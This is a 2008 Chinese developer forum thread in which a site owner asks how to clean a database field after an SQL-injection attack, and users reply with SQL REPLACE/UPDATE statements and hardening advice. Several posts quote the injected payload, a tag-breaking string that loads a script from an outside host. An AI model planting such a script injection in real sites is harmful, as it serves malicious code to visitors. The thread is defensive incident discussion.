紧急求助，数据被注入了，如果把数据库的数据改回来?

欢迎您:游客帮助

我参与的帖子

紧急求助，数据被注入了，如果把数据库的数据改回来? [已结贴,结贴人:kaqia2003]

kaqia2003
卡卡
等级:
可用分等级：中农
总技术专家分：32
总技术专家分排名：149326
揭帖率：95.50%

发表于：2008-05-16 10:22:44 楼主

数据库某个字段的内容原来是XXXXX
现在全被改为XXXXX+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!--

现在如果用sql语句改回来

紧求助啊。

问题点数：20 回复次数：21 修改删除举报引用回复

hackztx
Hi！菜鸟~~~~~~你兄弟我来啦！
等级:
可用分等级：乞丐
总技术专家分：2921
总技术专家分排名：7776

发表于：2008-05-16 10:26:361楼得分:0

update tab set column1 =replace(column1,'+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ','')

修改删除举报引用回复

kx_z2007
太阳的世界都是金子
等级:
可用分等级：贫农
总技术专家分：34
总技术专家分排名：146968

发表于：2008-05-16 10:29:282楼得分:0

update 数据表名称 set 字段名称=‘XXXXX’ where 字段名称=‘XXXXX+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ’

修改删除举报引用回复

lockepeak
等级:
可用分等级：中农
总技术专家分：162
总技术专家分排名：67484

发表于：2008-05-16 10:33:373楼得分:0

update yourtable set Textfiled=‘XXXXX+...’ where Textfiled=‘XXXXX'

修改删除举报引用回复

Teng_s2000
分涨的太慢,升星难啊!!
等级:
可用分等级：富农
总技术专家分：4435
总技术专家分排名：4624

发表于：2008-05-16 10:34:234楼得分:0

同情啊

修改删除举报引用回复

kaqia2003
卡卡
等级:
可用分等级：中农
总技术专家分：32
总技术专家分排名：149326

发表于：2008-05-16 10:45:355楼得分:0

引用 1 楼 hackztx 的回复:
update tab set column1 =replace(column1,'+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ','')

这个执行了好像没效果，谁能来解释一下。

修改删除举报引用回复

winner2050
winner
等级:
可用分等级：乞丐
总技术专家分：23939
总技术专家分排名：462

发表于：2008-05-16 10:46:566楼得分:0

拜托你。这个不是被注入。

是服务器中病毒了，要关心一下病毒的行情好不好。

修改删除举报引用回复

hackztx
Hi！菜鸟~~~~~~你兄弟我来啦！
等级:
可用分等级：乞丐
总技术专家分：2921
总技术专家分排名：7776

发表于：2008-05-16 10:50:397楼得分:0

引用 5 楼 kaqia2003 的回复:
引用 1 楼 hackztx 的回复:
update tab set column1 =replace(column1,'+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ','')

这个执行了好像没效果，谁能来解释一下。

不知道你给的替换字符串是否正确

例子如下:

create table test
(
name varchar(50)
)

insert into name values ('abc')

update test set name=replace('b','bbb')

select * from name//abbbc

修改删除举报引用回复

hackztx
Hi！菜鸟~~~~~~你兄弟我来啦！
等级:
可用分等级：乞丐
总技术专家分：2921
总技术专家分排名：7776

发表于：2008-05-16 10:52:308楼得分:0

SQL code

create table test
(
name varchar(50)
)

insert into test values ('abc')
select * from test--abc
update test set name=replace(name,'b','bbb')

select * from test--abbbc 

--drop table test

修改删除举报引用回复

5653325
等待开刃的刀
等级:
可用分等级：掌柜
总技术专家分：6674
总技术专家分排名：3071

发表于：2008-05-16 10:54:269楼得分:0

最好还是检查检查代码
临时改回来是治标不治本的。
看看代码里面那个地方有被注入的漏洞
找些安全方面的书看看吧

修改删除举报引用回复

tuyanhu
等级:
可用分等级：短工
总技术专家分：228
总技术专家分排名：54741

发表于：2008-05-16 10:56:0410楼得分:0

引用 6 楼 winner2050 的回复:
拜托你。这个不是被注入。

是服务器中病毒了，要关心一下病毒的行情好不好。

最近很多人中这种的了

修改删除举报引用回复

0xff
0xff
等级:
可用分等级：掌柜
总技术专家分：1464
总技术专家分排名：13926

发表于：2008-05-16 11:08:0111楼得分:0

引用 6 楼 winner2050 的回复:
拜托你。这个不是被注入。

是服务器中病毒了，要关心一下病毒的行情好不好。

不要误导别人好不好...
就算是中毒，也是发起攻击的服务器中毒，而不是被攻击的服务器中毒了.
从杀毒着手是解决不了这个问题的.

LZ最好还是从最近的备份里恢复被注入字段的数据.
（前些天我也是碰到这样情况，部分字段被覆盖）

恢复数据只能一时半会，一天之内肯定会被再次注入的...
要从根本上解决，一是修改程序，二是配置SQL帐号权限，将网站前台使用的SQL帐号配置为只读的权限.

修改删除举报引用回复

netfeel2008
先天下之忧而乐,后天下之乐而优。
等级:
可用分等级：富农
总技术专家分：659
总技术专家分排名：26466

发表于：2008-05-16 11:13:2712楼得分:0

引用 9 楼 5653325 的回复:
最好还是检查检查代码
临时改回来是治标不治本的。
看看代码里面那个地方有被注入的漏洞
找些安全方面的书看看吧

同情

修改删除举报引用回复

0xff
0xff
等级:
可用分等级：掌柜
总技术专家分：1464
总技术专家分排名：13926

发表于：2008-05-16 11:22:1013楼得分:0

补充一下：
现在的asp.net网站普遍存在注入漏洞的地方是有分页内容显示的页面，因为网上通用的分页存储过程都是采用重组SQL语句的方式来实现的。

如果要增加防注入模块的话，这些页面应为重点.

修改删除举报引用回复

xjbx
xjb(www.watch-life.net)
等级:
可用分等级：小地主
总技术专家分：10725
总技术专家分排名：1782

发表于：2008-05-16 11:31:3514楼得分:0

是呀，这不是sql注入的问题，是中毒了

修改删除举报引用回复

kaqia2003
卡卡
等级:
可用分等级：中农
总技术专家分：32
总技术专家分排名：149326

发表于：2008-05-16 12:41:5215楼得分:0

0xff，你说的
要从根本上解决，一是修改程序，二是配置SQL帐号权限，将网站前台使用的SQL帐号配置为只读的权限.

将网站前台的sql帐号配置为只读的权限，那么交互性访问写入的数据有影响吗?

修改删除举报引用回复

kaqia2003
卡卡
等级:
可用分等级：中农
总技术专家分：32
总技术专家分排名：149326

发表于：2008-05-16 12:43:1016楼得分:0

引用 13 楼 0xff 的回复:
补充一下：
现在的asp.net网站普遍存在注入漏洞的地方是有分页内容显示的页面，因为网上通用的分页存储过程都是采用重组SQL语句的方式来实现的。

如果要增加防注入模块的话，这些页面应为重点.

你说的这点要如何入手？

修改删除举报引用回复

tiancaolin
天草麟
等级:
可用分等级：中农
总技术专家分：3297
总技术专家分排名：6388

发表于：2008-05-16 12:49:5317楼得分:0

应该是病毒

修改删除举报引用回复

0xff
0xff
等级:
可用分等级：掌柜
总技术专家分：1464
总技术专家分排名：13926

发表于：2008-05-16 13:22:4418楼得分:20

如果网站前台有交互，一般可分为两种：
一是简单的统计或记录标记一类的，如计数器、投票、个性化配置等，这些交互的数据表一般字段都不会被注入，则可以给这些表单独配置写入权限；
二是文本提交的交互，如发表评论、主题文章等，这些交互本来就应当有防注入检查的，这类的数据表是注入的主要对象，如果你的网站前台提供这类的交互的话那就只能从程序着手了。
[最好是网站前后台分开使用不同的SQL帐号，前台如非必要尽量不写数据库]

至于我说的重点关照有分页内容的页面，则只能是在查询数据前先检查一遍参数是否有SQL注入的嫌疑（就是检查是否包含特殊关键字），这些在网上搜搜就有很多可参考的。

修改删除举报引用回复

0xff
0xff
等级:
可用分等级：掌柜
总技术专家分：1464
总技术专家分排名：13926

发表于：2008-05-16 13:33:4819楼得分:0

要彻底解决的话还是要把所有的漏洞都补上的，就看采用何种方式了，最好是能结合修改程序和配置SQL权限做到双重安全...

如果程序漏洞太多，修补程序代价太大，则可以考虑把交互部分独立出来，使用有部分写入权限的SQL帐号，但要同时修补这部分程序的注入漏洞.

修改删除举报引用回复

kaqia2003
卡卡
等级:
可用分等级：中农
总技术专家分：32
总技术专家分排名：149326

发表于：2008-05-16 13:47:1320楼得分:0

引用 19 楼 0xff 的回复:
要彻底解决的话还是要把所有的漏洞都补上的，就看采用何种方式了，最好是能结合修改程序和配置SQL权限做到双重安全...

如果程序漏洞太多，修补程序代价太大，则可以考虑把交互部分独立出来，使用有部分写入权限的SQL帐号，但要同时修补这部分程序的注入漏洞.

唉，真是头疼的问题，很大部分程序是前面的人写的。修改程序还得看原来的人写的代码，有什么比较彻底的方法能杜绝这种现在的再次发生，比如系统方面的措施.

修改删除举报引用回复

0xff
0xff
等级:
可用分等级：掌柜
总技术专家分：1464
总技术专家分排名：13926

发表于：2008-05-16 14:32:3821楼得分:0

还有一种方案，就是加上一个UrlReWrite，检查URL是否包含非法关键字。

修改删除举报引用回复

将帖子提前放进我的网摘推荐给好友

我要提问帖子加分结贴去... 管理菜单

网站简介－广告服务－网站地图－帮助－联系方式－诚聘英才－English－问题报告
北京创新乐知广告有限公司版权所有京 ICP 证 070598 号
世纪乐知(北京)网络技术有限公司提供技术支持
Copyright © 2000-2008, CSDN.NET, All Rights Reserved